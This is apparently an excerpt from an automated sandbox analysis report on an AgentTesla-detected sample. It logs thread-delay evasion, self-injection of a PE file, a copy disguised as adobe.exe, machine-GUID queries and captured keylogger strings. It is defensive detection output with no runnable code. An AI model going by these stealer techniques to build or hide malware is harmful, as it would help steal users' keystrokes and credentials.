Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597032	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596771	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596478	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596326	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594305	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594171	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594044	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 593927	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595895	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595535	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595418	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594385	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594271	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597779	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597123	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594686	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594578	Jump to behavior

Source: ukBQ4ch2nE.exe, 00000002.00000002.4034617232.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1783581463.000000000126C000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4034399772.0000000000EF6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Memory written: C:\Users\user\Desktop\ukBQ4ch2nE.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process created: C:\Users\user\Desktop\ukBQ4ch2nE.exe "C:\Users\user\Desktop\ukBQ4ch2nE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior

Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq
Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $eq8<b>[ Program Manager]</b> (11/01/2025 07:29:48)<br>{Win}THjq
Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $eq9<b>[ Program Manager]</b> (11/01/2025 07:29:48)<br>{Win}rTHjq
Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A46000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <html>Time: 01/24/2025 23:57:06<br>User Name: user<br>Computer Name: 436432<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.189<br><hr><b>[ Program Manager]</b> (11/01/2025 07:29:48)<br>{Win}r</html>
Source: ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $eq3<b>[ Program Manager]</b> (11/01/2025 07:29:48)<br>

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Users\user\Desktop\ukBQ4ch2nE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Users\user\Desktop\ukBQ4ch2nE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ukBQ4ch2nE.exe PID: 4576, type: MEMORYSTR
